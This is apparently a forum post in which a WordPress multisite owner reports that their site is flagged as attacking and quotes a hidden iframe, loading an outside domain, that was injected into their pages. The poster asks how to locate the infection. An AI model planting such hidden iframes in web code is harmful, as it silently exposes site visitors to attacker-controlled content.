I have created multisite with subdomain. It works perfact.
But from last few days it gives error as attacking site. I show in firebug that some script or iframe embeded in my code.
This is iframe which is add at last in my code.
<iframe src="http://androidczad.info/" style="visibility: hidden; display: none; display: none;">
I check all my themes code for remove this but i cant find where this code is embed please help me...
Is this code embed in wordpress core file????
How can i find malware code in my files??
(I am not using any plugins and i am use two themes both are custom themes which i create my self.)